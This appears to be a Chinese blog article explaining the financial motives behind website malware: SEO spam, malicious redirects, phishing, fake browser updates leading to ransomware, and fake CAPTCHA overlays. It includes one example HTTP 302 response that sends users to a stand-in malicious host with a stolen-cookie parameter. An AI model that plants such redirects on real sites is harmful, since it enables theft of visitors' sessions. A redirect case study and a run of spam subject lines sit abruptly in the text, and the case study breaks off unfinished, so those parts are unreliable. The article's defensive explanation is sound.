网站恶意软件攻击的动机是什么？

媒体对黑客的描述往往是戴着巴拉克拉法帽的恶棍，在黑暗的地下室里疯狂打字，心中只有邪恶的意图。然而，虽然在某些情况下确实如此，但总的来说，导致恶意软件攻击的决定性因素并非意识形态或恶意，而是物质利益。

在撰写这篇文章时，我不禁想到了自嘲式的电视剧《犯罪现场调查：网络犯罪》，特别是其中一集，一个住在地下室、头发油腻的邪恶黑客入侵了过山车，杀死了车上的所有人，仅仅因为他是一个坏人，想要对毫无戒心的好人做坏事。

网络安全的第一条规则是“像攻击者一样思考”。因此，我们有必要了解是什么驱动着他们。在这篇文章中，我们将尝试揭开网站恶意软件攻击背后的原因，它们发生的原因，并回顾一些最常见的在线威胁，以便更深入地了解它们。

意软件攻击的起源

毋庸置疑，从事网络犯罪需要特定的安全技能，比如说“网络知识、数据库、服务器及渗透技巧”。然而，总体而言，攻击往往针对受害者，而攻击者往往居住在其他地方，远离可能对其行为产生后果的法律框架或者才采用代理技术。

攻击频发的国家往往年轻人的就业前景不佳，拥有良好的网络基础设施，以及优秀的公立技术学院，潜在攻击者可以在那里学习相关知识。

归根结底，金钱是几乎所有网站攻击的共同点。毕竟，恶意软件是一门生意。黑市在很多方面都与合法经济相似，据报道，一些犯罪企业设有人力资源部门，并设立了“月度最佳员工”计划。其他威胁行为者也确实存在，例如低级别的“黑客行动主义者”，甚至还有充当“高级持续性威胁”的民族国家，但对大多数网站所有者构成最大问题的威胁行为者类型介于这几种类型之间。

让我们继续分析一些最常见的网站恶意软件攻击，并回顾其背后的经济动机。

SEO 垃圾邮件

SEO（搜索引擎优化）垃圾邮件无疑是网站所有者面临的最大困扰之一。这些垃圾邮件包含仿冒药品、盗版品牌产品、假冒名牌手表、种子文件、论文代写服务、不靠谱在线赌场等等的反向链接和广告。但究竟是什么动机促使这些垃圾邮件发送者感染网站，并在其中植入大量（通常是隐藏的）指向这些低质量、劣质垃圾网站的链接呢？

邮件标题：

"超高流量网站等着你！"

"独家外链服务，让你轻松登顶搜索引擎！"

"专业外链建设，提升网站排名速度翻倍！"

我上面提到的所有信誉不佳的内容都存在于某些网站上——而且数量众多。但是，这些垃圾网站的所有者如何说服人们访问他们的网站呢？毕竟，有成千上万的网站在销售垃圾商品或服务，还有许多垃圾网站运营者试图加入其中。与“常规经济”不同，在“常规经济”中，同行业的网站试图通过 SEO 互相竞争，以便在搜索结果中排名高于竞争对手；黑市经济也是如此，他们销售仿冒伟哥并推广可疑的在线赌场。

理解SEO垃圾广告的关键在于搜索引擎算法的工作原理。网络上有超过十亿个网站，搜索引擎需要一种对它们进行排名的方法，以便在用户搜索时显示相关的结果。搜索引擎实现这一目标的方法之一就是在搜索结果中赋予那些有很多其他网站链接到的网站更高的权重。一个很好的例子是，如果你搜索“如何修复_____”，像Reddit这样的网站通常会出现在搜索结果顶部附近，因为数百万用户使用该网站并频繁链接到它。

因此，本质上，黑客SEO是一种试图欺骗搜索算法的行为，使其“欺骗”搜索引擎，让它们认为这些垃圾网站比实际更受欢迎。通过这种方式，SEO垃圾广告完全是为了增加垃圾网站的流量，最终目标是——你猜对了——盈利。

浏览器重定向

网站所有者面临的另一个常见麻烦是感染，它会将他们的网站流量重定向到通常不受欢迎的网站。常见的罪魁祸首包括网络诈骗、成人视频或约会网站，或者销售垃圾仿冒产品或药品的网站。

与前面提到的 SEO 垃圾邮件类似，浏览器重定向是垃圾邮件发送者和诈骗者将流量引导至其可疑网站的一种方式。只不过，在这种情况下，攻击者采取的手段更为直接，而不是偷偷地将一些反向链接添加到受感染的网站。

实际案例：用户登录变赌博

我们复现了问题场景：

用户访问 www.our-app.com/login?redirect=/profile

输入正确账号密码

页面跳转到...澳门首家线上赌场（！）

HTTP/1.1 302 FoundLocation: https://malicious-site.com?steal_cookie=123abc

关键问题解析：

起初我们以为用户访问的是正常路径/profile，但实际攻击发生时，redirect参数是经过精心伪装的：

重定向的工作原理

那些被认为“低质量”或“最差劲”的网站，甚至是那些明显是骗局的网站，流量往往不大，原因很简单——人们不想访问它们。因此，攻击者会劫持合法网站的流量，将毫无戒心的访客引诱到他们自己的垃圾网站。

攻击者通常会修改网站的 .htaccess 文件、核心文件、主题文件，或在受感染的环境中安装恶意插件。大多数人在遇到明显的骗局，例如“第 10,000 位访客，填写您的信息即可赢取免费 iPhone”时，都会知道这是一个明显的骗局。然而，每重定向几百人，即使只有一个人上当受骗，攻击者仍然能够从中获利。

网络钓鱼

在2025年，几乎每个人都知道什么是网络钓鱼；甚至现在小学就开始教育孩子们了！然而，它与被黑客入侵网站的联系却鲜为人知。

正如大多数人所知，网络钓鱼是指攻击者设置一个虚假的登录页面，使其看起来与合法的登录页面难以区分。攻击者通常的目标是窃取银行、社交媒体网站和在线零售商的凭证。

关于网络钓鱼，各位可以看看我往期文章中的内容。

虚假浏览器更新/勒索软件

勒索软件攻击会加密受感染文件系统上的所有文件。攻击者随后会要求用户支付赎金（通常以比特币或其他加密货币支付）才能解密文件。然而，为了诱骗用户部署恶意软件，攻击者需要找到一种方法来诱骗用户将其安装到他们的系统中。为此，他们通常使用受感染的、原本合法的网站。

多年来，虚假浏览器更新一直是最常见的网站恶意软件感染之一。这种恶意软件通常被称为“Socgholish”，尽管许多其他模仿者也加入了这一行列。该恶意软件会劫持网站环境并生成一个覆盖层，诱骗用户下载并安装伪装成受害者浏览器（如 Chrome 或 Firefox）更新的恶意软件。

随着恶意软件攻击日益普及，如今的用户也越来越养成更谨慎、更完善的浏览习惯。正因如此，攻击者才会将原本值得信赖的网站作为目标，而这些网站往往早已为潜在受害者所熟知。

虚假的浏览器更新往往是勒索软件攻击的第一阶段。一旦受害者在其设备（通常是 Windows 设备）上安装了木马程序，攻击者就完全控制了整个环境。此时，他们便可以对受感染的设备，甚至整个网络（取决于网络配置）发起勒索软件攻击。

伪造的 CloudFlare 和 CAPTCHA 覆盖

最近我们发现另一种类似的感染大幅增加，它会生成伪造的 CloudFlare 或 Google CAPTCHA 验证覆盖：

然后提示用户运行一些恶意的 powershell 命令，这些命令类似于 Socgholish，会使用远程访问木马感染目标计算机：